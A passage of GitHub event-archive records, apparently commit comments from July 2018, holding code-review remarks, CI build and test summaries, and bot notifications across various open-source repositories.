found.)\n * mini/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * MTouch tests/NUnit: Failed (Execution failed with exit code 3)\n"}},"created_at":"2018-07-03T20:30:42Z"}
{"id":"7914846894","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29586707,"position":null,"line":null,"path":null,"commit_id":"a5b0e187a0bfbaa47727d68f169b3c113d5527e7","created_at":"2018-07-03T20:31:01Z","updated_at":"2018-07-03T20:31:01Z","author_association":"COLLABORATOR","body":"@killjoy1221 I don't have force push so you'll have to rebase master back to splice out this commit."}},"created_at":"2018-07-03T20:31:01Z"}
{"id":"7914847171","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586709,"position":32,"line":196,"path":"Gravity/Gravity/Base/BaseDto.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:31:05Z","updated_at":"2018-07-03T20:31:05Z","author_association":"COLLABORATOR","body":"When you get VS2017 properly setup you can simplify this to `propertyInfo.GetCustomAttribute<RelativityObjectFieldParentArtifactIdAttribute>()?.FieldGuid is Guid fieldGuid`"}},"created_at":"2018-07-03T20:31:05Z"}
{"id":"7914848872","type":"CommitCommentEvent","actor":{"login":"lcarozzi"},"repo":{"name":"pazcuturi/device-monitor"},"payload":{"comment":{"id":29586714,"position":4,"line":4,"path":"app/models/user.rb","commit_id":"772f0fc4602662f87e23f9553bddd24910f9f93f","created_at":"2018-07-03T20:31:27Z","updated_at":"2018-07-03T20:31:27Z","author_association":"COLLABORATOR","body":"unnecessary comments"}},"created_at":"2018-07-03T20:31:27Z"}
{"id":"7914850775","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Back"},"payload":{"comment":{"id":29586719,"position":null,"line":null,"path":null,"commit_id":"9a1a0d786e705f2da1acb147b3e65f63afabb81f","created_at":"2018-07-03T20:31:53Z","updated_at":"2018-07-03T20:31:53Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Нужен контейнер для настроек в профиле, чтобы запоминать их не только на одном устройстве](https://trello.com/c/heTCdHp0/41-%D0%BD%D1%83%D0%B6%D0%B5%D0%BD-%D0%BA%D0%BE%D0%BD%D1%82%D0%B5%D0%B9%D0%BD%D0%B5%D1%80-%D0%B4%D0%BB%D1%8F-%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B5%D0%BA-%D0%B2-%D0%BF%D1%80%D0%BE%D1%84%D0%B8%D0%BB%D0%B5-%D1%87%D1%82%D0%BE%D0%B1%D1%8B-%D0%B7%D0%B0%D0%BF%D0%BE%D0%BC%D0%B8%D0%BD%D0%B0%D1%82%D1%8C-%D0%B8%D1%85-%D0%BD%D0%B5-%D1%82%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE-%D0%BD%D0%B0-%D0%BE%D0%B4%D0%BD%D0%BE%D0%BC-%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B9%D1%81%D1%82%D0%B2%D0%B5)"}},"created_at":"2018-07-03T20:31:53Z"}
{"id":"7914851570","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29586720,"position":null,"line":null,"path":null,"commit_id":"ea3b2fb3457e9d8b4d2c1c6254ddcbd8004e6147","created_at":"2018-07-03T20:32:04Z","updated_at":"2018-07-03T20:32:04Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-service](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-service).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-service-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T20:32:04Z"}
{"id":"7914852408","type":"CommitCommentEvent","actor":{"login":"Anipik"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29586723,"position":61,"line":303,"path":"src/System.Runtime.Extensions/src/System/AppDomain.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T20:32:15Z","updated_at":"2018-07-03T20:32:15Z","author_association":"MEMBER","body":"I think this works for only static methods\r\nhttps://github.com/dotnet/coreclr/blob/master/src/System.Private.CoreLib/src/System/Delegate.cs#L416\r\n\r\nI tried with converting it to static method and it worked.\r\n"}},"created_at":"2018-07-03T20:32:15Z"}
{"id":"7914853121","type":"CommitCommentEvent","actor":{"login":"lcarozzi"},"repo":{"name":"pazcuturi/device-monitor"},"payload":{"comment":{"id":29586725,"position":1,"line":1,"path":"config/cable.yml","commit_id":"772f0fc4602662f87e23f9553bddd24910f9f93f","created_at":"2018-07-03T20:32:25Z","updated_at":"2018-07-03T20:32:25Z","author_association":"COLLABORATOR","body":"do we need this?"}},"created_at":"2018-07-03T20:32:25Z"}
{"id":"7914853648","type":"CommitCommentEvent","actor":{"login":"0rlaf"},"repo":{"name":"MishFdM/MIUI_V10_Italy"},"payload":{"comment":{"id":29586727,"position":null,"line":null,"path":null,"commit_id":"52a41536e8e64754ed1008f5625f40ca67c35300","created_at":"2018-07-03T20:32:32Z","updated_at":"2018-07-03T20:32:32Z","author_association":"CONTRIBUTOR","body":"@entony80 \r\n\r\nDalla 595 alla 598 sono improponibili (specialmente la 595).\r\n\r\nCorreggi così:\r\n\r\n595: Impossibile ottenere i dati\r\n596: Impossibile trovare dati\r\n597: Impossibile ottenere info sul sensore\r\n598: Impossibile inizializzare sensore: %1$s"}},"created_at":"2018-07-03T20:32:32Z"}
{"id":"7914854272","type":"CommitCommentEvent","actor":{"login":"Antiheavy"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":29586730,"position":null,"line":null,"path":null,"commit_id":"45e1234e7750c23b51c59d2d0da7e145f0283b6f","created_at":"2018-07-03T20:32:41Z","updated_at":"2018-07-03T20:32:41Z","author_association":"NONE","body":"@dagar and I were discussing previously the merits for and against forcing LandDector into the Landed state while Launch Detection is running. Not sure how that might fit in here but I thought I’d mention the idea.  Seems like landdetector messes up a lot of things with fixed wing hand launch vehicles. "}},"created_at":"2018-07-03T20:32:41Z"}
{"id":"7914857046","type":"CommitCommentEvent","actor":{"login":"hdeljah"},"repo":{"name":"hdeljah/Stretch-Script"},"payload":{"comment":{"id":29586736,"position":null,"line":null,"path":null,"commit_id":"b5ed7e0c4bbd2399e6161e2482b13b8304f910da","created_at":"2018-07-03T20:33:22Z","updated_at":"2018-07-03T20:33:22Z","author_association":"OWNER","body":"Start"}},"created_at":"2018-07-03T20:33:22Z"}
{"id":"7914858105","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586737,"position":12,"line":176,"path":"Gravity/Gravity/Base/BaseDto.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:33:37Z","updated_at":"2018-07-03T20:33:37Z","author_association":"COLLABORATOR","body":"use `GetPropertyAttributeTuples`"}},"created_at":"2018-07-03T20:33:37Z"}
{"id":"7914863619","type":"CommitCommentEvent","actor":{"login":"gamalielhere"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29586749,"position":5,"line":34,"path":"src/components/Blockie/Blockie.vue","commit_id":"b9b0a2c706a5e7a714e5caebe3ac7d992f3a9af6","created_at":"2018-07-03T20:34:54Z","updated_at":"2018-07-03T20:34:54Z","author_association":"CONTRIBUTOR","body":"I think it has better readability this way. But I can change it back to functions, and update the rest of them in function"}},"created_at":"2018-07-03T20:34:54Z"}
{"id":"7914864270","type":"CommitCommentEvent","actor":{"login":"eaxvac"},"repo":{"name":"eaxvac/Harepacker-resurrected"},"payload":{"comment":{"id":29586751,"position":null,"line":null,"path":null,"commit_id":"092f8db1f51bad210821e86aba89bc975504e2af","created_at":"2018-07-03T20:35:03Z","updated_at":"2018-07-03T20:35:03Z","author_association":"OWNER","body":"<img width=\"482\" alt=\"zlz keys\" src=\"https://user-images.githubusercontent.com/4586194/42243342-9c7194e2-7f43-11e8-91cb-8711eed2121d.PNG\">\r\n"}},"created_at":"2018-07-03T20:35:03Z"}
{"id":"7914866084","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586757,"position":13,"line":13,"path":"Gravity/Gravity/Globals/SQLConstants.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:35:28Z","updated_at":"2018-07-03T20:35:28Z","author_association":"COLLABORATOR","body":"Can we create a resource file for this, and move the big queries into files that the resource file reads in?"}},"created_at":"2018-07-03T20:35:28Z"}
{"id":"7914867020","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29586758,"position":null,"line":null,"path":null,"commit_id":"cf994ca4d07b19e6a6a5dbf4ce35543581054ec6","created_at":"2018-07-03T20:35:40Z","updated_at":"2018-07-03T20:35:40Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[1] Ve výpisu aktivity nefunguje řazení dle položky organizátoři](https://trello.com/c/xIOKgpWD/605-1-ve-v%C3%BDpisu-aktivity-nefunguje-%C5%99azen%C3%AD-dle-polo%C5%BEky-organiz%C3%A1to%C5%99i)"}},"created_at":"2018-07-03T20:35:40Z"}
{"id":"7914867212","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586760,"position":13,"line":13,"path":"Gravity/Gravity/Globals/SQLConstants.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:35:43Z","updated_at":"2018-07-03T20:35:43Z","author_association":"COLLABORATOR","body":"The sql in the field name is redundant"}},"created_at":"2018-07-03T20:35:43Z"}
{"id":"7914867887","type":"CommitCommentEvent","actor":{"login":"stephentoub"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29586761,"position":13,"line":89,"path":"src/System.Security.Claims/src/System/Security/Claims/GenericPrincipal.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T20:35:52Z","updated_at":"2018-07-03T20:35:52Z","author_association":"MEMBER","body":"> I think this method needs to be public. Otherwise, it is going to be trimmed by the ILLinker.\r\n\r\nI'd prefer if we used an ILLink trim config file to exclude it rather than making it public, e.g. https://github.com/dotnet/corefx/blob/master/src/System.Linq/src/ILLinkTrim.xml"}},"created_at":"2018-07-03T20:35:52Z"}
{"id":"7914867925","type":"CommitCommentEvent","actor":{"login":"lcarozzi"},"repo":{"name":"pazcuturi/device-monitor"},"payload":{"comment":{"id":29586762,"position":null,"line":null,"path":null,"commit_id":"772f0fc4602662f87e23f9553bddd24910f9f93f","created_at":"2018-07-03T20:35:53Z","updated_at":"2018-07-03T20:35:53Z","author_association":"COLLABORATOR","body":"Added some comments on old commit"}},"created_at":"2018-07-03T20:35:53Z"}
{"id":"7914869087","type":"CommitCommentEvent","actor":{"login":"ikzk"},"repo":{"name":"karoka/Phys514_HW2"},"payload":{"comment":{"id":29586766,"position":null,"line":null,"path":null,"commit_id":"0140be2c97d9fe07f1eeafe8380dfe5dc7c97e5c","created_at":"2018-07-03T20:36:11Z","updated_at":"2018-07-03T20:36:11Z","author_association":"NONE","body":"虽不名单角力"}},"created_at":"2018-07-03T20:36:11Z"}
{"id":"7914872086","type":"CommitCommentEvent","actor":{"login":"alexwebster1969"},"repo":{"name":"alexwebster1969/izo.github.io"},"payload":{"comment":{"id":29586767,"position":null,"line":null,"path":null,"commit_id":"a7b7e12ea05a7e5b9cb3069240d957331afeca5b","created_at":"2018-07-03T20:36:55Z","updated_at":"2018-07-03T20:36:55Z","author_association":"OWNER","body":"Just a test moving\r\n===========\r\n\r\nMore and more attempts\r\n---------------------------"}},"created_at":"2018-07-03T20:36:55Z"}
{"id":"7914875923","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29586776,"position":null,"line":null,"path":null,"commit_id":"13d69af0a4d201ab12d2558d9732b5c7f5e78c35","created_at":"2018-07-03T20:37:52Z","updated_at":"2018-07-03T20:37:52Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 12 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-03T20:37:52Z"}
{"id":"7914876011","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586777,"position":110,"line":110,"path":"Gravity/Gravity/Globals/SQLConstants.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:37:53Z","updated_at":"2018-07-03T20:37:53Z","author_association":"COLLABORATOR","body":"We can't cap these to 1000. We will need to add a variable to pass into an OFFSET clause, and page over the results."}},"created_at":"2018-07-03T20:37:53Z"}
{"id":"7914877027","type":"CommitCommentEvent","actor":{"login":"ClockVapor"},"repo":{"name":"seik/kotlin-telegram-bot"},"payload":{"comment":{"id":29586780,"position":null,"line":null,"path":null,"commit_id":"7b9c36e6693cfb5b7ae110feb26535f5abf0b10b","created_at":"2018-07-03T20:38:09Z","updated_at":"2018-07-03T20:38:09Z","author_association":"NONE","body":"@seik: Also I forgot to mention that `username` should be nullable too. https://core.telegram.org/bots/api#user"}},"created_at":"2018-07-03T20:38:09Z"}
{"id":"7914878139","type":"CommitCommentEvent","actor":{"login":"tooptooptoop"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29586783,"position":33,"line":39,"path":"app/src/main/java/com/example/android/miwok/NumbersActivity.java","commit_id":"4ffd4a73a8d4e44b4cf78a32f16b46c004ac28cc","created_at":"2018-07-03T20:38:26Z","updated_at":"2018-07-03T20:38:26Z","author_association":"NONE","body":"thanks\r\n"}},"created_at":"2018-07-03T20:38:26Z"}
{"id":"7914882645","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"m-bosman/phpmyadmin"},"payload":{"comment":{"id":29586791,"position":null,"line":null,"path":null,"commit_id":"ba84ccd96ac7be89a6bf131290522d290374d69d","created_at":"2018-07-03T20:39:32Z","updated_at":"2018-07-03T20:39:32Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-03T20:39:32Z"}
{"id":"7914884458","type":"CommitCommentEvent","actor":{"login":"n-b-sonar"},"repo":{"name":"SonarSource/sonar-custom-rules-examples"},"payload":{"comment":{"id":29586798,"position":39,"line":88,"path":"java-custom-rules/pom.xml","commit_id":"98afcd602106234a74c55bd348856c22b870d227","created_at":"2018-07-03T20:39:59Z","updated_at":"2018-07-03T20:39:59Z","author_association":"NONE","body":"Just so I understand: why does this dependency and the guava one have to be added ?"}},"created_at":"2018-07-03T20:39:59Z"}
{"id":"7914884781","type":"CommitCommentEvent","actor":{"login":"openhab-bot"},"repo":{"name":"openhab/org.openhab.binding.zwave"},"payload":{"comment":{"id":29586799,"position":null,"line":null,"path":null,"commit_id":"a682a47603e84d921011ef1e1bf4c7761d3a00c2","created_at":"2018-07-03T20:40:03Z","updated_at":"2018-07-03T20:40:03Z","author_association":"COLLABORATOR","body":"This commit has been mentioned on **openHAB Community**. There might be relevant details there:\n\nhttps://community.openhab.org/t/oh2-z-wave-refactoring-and-testing-and-security/21653/3115\n"}},"created_at":"2018-07-03T20:40:03Z"}
{"id":"7914887035","type":"CommitCommentEvent","actor":{"login":"GaelVaroquaux"},"repo":{"name":"nilearn/nilearn"},"payload":{"comment":{"id":29586802,"position":null,"line":null,"path":null,"commit_id":"1e33ec1600236e52228aa7f6c3fd34a2a46d78c1","created_at":"2018-07-03T20:40:33Z","updated_at":"2018-07-03T20:40:33Z","author_association":"CONTRIBUTOR","body":"> assert_warns is actually imported from this module by other modules. good catch by @KamalakerDadi\n\nYes, this was a really lousy job that I did. Sorry.\n"}},"created_at":"2018-07-03T20:40:33Z"}
{"id":"7914888035","type":"CommitCommentEvent","actor":{"login":"openhab-bot"},"repo":{"name":"openhab/org.openhab.binding.zwave"},"payload":{"comment":{"id":29586803,"position":null,"line":null,"path":null,"commit_id":"a682a47603e84d921011ef1e1bf4c7761d3a00c2","created_at":"2018-07-03T20:40:47Z","updated_at":"2018-07-03T20:40:47Z","author_association":"COLLABORATOR","body":"This commit has been mentioned on **openHAB Community**. There might be relevant details there:\n\nhttps://community.openhab.org/t/oh2-z-wave-refactoring-and-testing-and-security/21653/3115\n"}},"created_at":"2018-07-03T20:40:47Z"}
{"id":"7914893986","type":"CommitCommentEvent","actor":{"login":"openhab-bot"},"repo":{"name":"openhab/org.openhab.binding.zwave"},"payload":{"comment":{"id":29586811,"position":null,"line":null,"path":null,"commit_id":"a682a47603e84d921011ef1e1bf4c7761d3a00c2","created_at":"2018-07-03T20:42:15Z","updated_at":"2018-07-03T20:42:15Z","author_association":"COLLABORATOR","body":"This commit has been mentioned on **openHAB Community**. There might be relevant details there:\n\nhttps://community.openhab.org/t/oh2-z-wave-refactoring-and-testing-and-security/21653/3115\n"}},"created_at":"2018-07-03T20:42:15Z"}
{"id":"7914894528","type":"CommitCommentEvent","actor":{"login":"baarsrj"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29586812,"position":null,"line":null,"path":null,"commit_id":"1685373dedc9d430b35e834ebdf7877e5fcd21d8","created_at":"2018-07-03T20:42:23Z","updated_at":"2018-07-03T20:42:23Z","author_association":"CONTRIBUTOR","body":"Not really, some explanation has to be added.Op 3 jul. 2018 18:20 schreef Daniel Naber <notifications@github.com>:If these are just words replaced by other words, isn't replace.txt enough?\r\n\r\n—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-03T20:42:23Z"}
{"id":"7914894537","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29586813,"position":null,"line":null,"path":null,"commit_id":"13d69af0a4d201ab12d2558d9732b5c7f5e78c35","created_at":"2018-07-03T20:42:23Z","updated_at":"2018-07-03T20:42:23Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-03T20:42:23Z"}
{"id":"7914894995","type":"CommitCommentEvent","actor":{"login":"openhab-bot"},"repo":{"name":"openhab/org.openhab.binding.zwave"},"payload":{"comment":{"id":29586814,"position":null,"line":null,"path":null,"commit_id":"a682a47603e84d921011ef1e1bf4c7761d3a00c2","created_at":"2018-07-03T20:42:30Z","updated_at":"2018-07-03T20:42:30Z","author_association":"COLLABORATOR","body":"This commit has been mentioned on **openHAB Community**. There might be relevant details there:\n\nhttps://community.openhab.org/t/oh2-z-wave-refactoring-and-testing-and-security/21653/3115\n"}},"created_at":"2018-07-03T20:42:30Z"}
{"id":"7914895308","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29586815,"position":null,"line":null,"path":null,"commit_id":"75caded42488b11d964857513b43c528e4124c4e","created_at":"2018-07-03T20:42:35Z","updated_at":"2018-07-03T20:42:35Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `nodes_count` |       +8 |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     -830 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4411)*\n"}},"created_at":"2018-07-03T20:42:35Z"}
{"id":"7914895840","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29586817,"position":null,"line":null,"path":null,"commit_id":"3d275a95d05065c83638da2c0c171ed32061df9e","created_at":"2018-07-03T20:42:43Z","updated_at":"2018-07-03T20:42:43Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpresss](https://wordpresss-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-s3](https://wordpresss-static-docs.pantheonsite.io/docs/wordpress-s3)\n"}},"created_at":"2018-07-03T20:42:43Z"}
{"id":"7914897704","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586818,"position":23,"line":23,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:43:10Z","updated_at":"2018-07-03T20:43:10Z","author_association":"COLLABORATOR","body":"`sqlGetChoicesValuesByArtifactIds` has a `%%ArtifactIds%%` token. Can we use that same idea here?"}},"created_at":"2018-07-03T20:43:10Z"}
{"id":"7914898156","type":"CommitCommentEvent","actor":{"login":"tripwires"},"repo":{"name":"AthenaGaKill/Tripster-Coding-Ex"},"payload":{"comment":{"id":29586823,"position":22,"line":22,"path":"Ex11PalindromeNoFunc.html","commit_id":"62c5cb2aa52844477407bac43b96bec2c0ca60be","created_at":"2018-07-03T20:43:16Z","updated_at":"2018-07-03T20:43:16Z","author_association":"COLLABORATOR","body":"Let's try to change this a bit... Maybe write these functions by yourself. This is a good exercise I think."}},"created_at":"2018-07-03T20:43:16Z"}
{"id":"7914901193","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586829,"position":25,"line":25,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:44:03Z","updated_at":"2018-07-03T20:44:03Z","author_association":"COLLABORATOR","body":"You can simplify this whole block likle `string.Join(\",\", guids.Select(g => \"'{g}'\"))`"}},"created_at":"2018-07-03T20:44:03Z"}
{"id":"7914903667","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586835,"position":38,"line":38,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:44:38Z","updated_at":"2018-07-03T20:44:38Z","author_association":"COLLABORATOR","body":"use `ToDictionary`"}},"created_at":"2018-07-03T20:44:38Z"}
